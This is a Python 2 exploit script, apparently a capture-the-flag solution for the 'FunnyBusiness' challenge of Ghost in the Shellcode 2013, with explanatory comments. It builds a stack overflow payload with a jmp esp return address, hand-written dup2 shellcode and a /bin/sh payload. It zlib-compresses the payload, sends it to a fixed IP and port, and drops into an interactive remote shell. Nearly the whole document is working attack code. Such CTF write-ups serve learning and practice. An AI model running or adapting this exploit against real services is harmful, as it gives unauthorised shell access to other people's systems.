#!/usr/bin/env python2
# Ghost in the Shellcode 2013 : FunnyBusiness
# http://shell-storm.org/repo/CTF/GITS-2013/Pwnable/FunnyBusiness-100/
from pwn import *
import zlib
# --- Exploit parameters ------------------------------------------------------
# Address of a `jmp esp` gadget inside the target binary (gadget-finder note
# kept from the original). Two properties of the target make this chain work:
# the code address is fixed (no PIE/ASLR on the text segment), and the bytes
# following the return address are executed from the stack (no NX/W^X).
# Either mitigation alone would break it.
addr_jmp_esp = 0x08049043 # 0x08049043: jmp esp ; (1 found)
# Bytes zlib emits in front of the data when compressing at level 0 (a
# "stored" stream): 2-byte zlib header + 5-byte stored-block header. The
# offset arithmetic below treats these as part of the overflowing buffer,
# i.e. the overflow apparently happens on the *compressed* input.
zlib_header_length = 7
# Distance from the start of the received buffer to the saved return
# address; presumably measured by crashing the binary under a debugger
# (not shown here).
offset_return_addr = 13
# File descriptor the service uses for the client connection; assumed to be
# 4 on the target — the dup2 loop below is hard-wired to this value.
socket_fd = 4
context(os='linux', arch='i386')
r = remote('169.254.226.239', 49681)
# --- Build the payload (Python 2: str is a byte string; pwntools of that era
# returns str from p32()/asm() as well) ---------------------------------------
payload = ''
# Filler up to the saved return address; the zlib framing supplies the first
# zlib_header_length bytes of the buffer.
payload += 'A' * (offset_return_addr - zlib_header_length)
# Overwrite the saved return address with the gadget so execution continues
# at the bytes that follow on the stack.
payload += p32(addr_jmp_esp)
# dup2(fd,0); dup2(fd,1); dup2(fd,2);
# Hand-written i386 stub: point stdin/stdout/stderr at the client socket so
# the shell spawned afterwards talks over the existing connection.
payload += '\x31\xc9' # xor %ecx,%ecx         ; ecx = 0, the target fd counter
payload += '\x8d\x59' + chr(socket_fd) # lea ebx, [ecx + socket_fd] ; ebx = socket_fd (disp8 form)
# loop:
payload += '\x6a\x3f' # push $0x3f            ; 0x3f = dup2 syscall number on i386
payload += '\x58' # pop %eax                  ; reloaded each pass: int 0x80 overwrites eax
payload += '\xcd\x80' # int $0x80             ; dup2(ebx, ecx)
payload += '\x41' # inc %ecx
payload += '\x80\xf9\x03' # cmp $0x3,%cl      ; stop once fds 0, 1 and 2 are done
payload += '\x75\xf5' # jne 80483e8 <loop>    ; rel8 = -11, back to the `push $0x3f`
# pwntools' generic /bin/sh shellcode, assembled for the context set above.
payload += asm(shellcraft.sh())
log.info('payload:\n%s' % hexdump(payload))
# Level 0 = stored blocks, no compression: the payload bytes appear verbatim
# in the zlib stream, which keeps the offsets above meaningful.
zlibed_payload = zlib.compress(payload, 0)
log.info('zlibed_payload:\n%s' % hexdump(zlibed_payload))
# --- Send: 4-byte little-endian length prefix, then the stream (the wire
# format this script assumes for the service) --------------------------------
log.info('send payload length')
r.send(p32(len(zlibed_payload)))
log.info('send payload')
r.send(zlibed_payload)
r.interactive()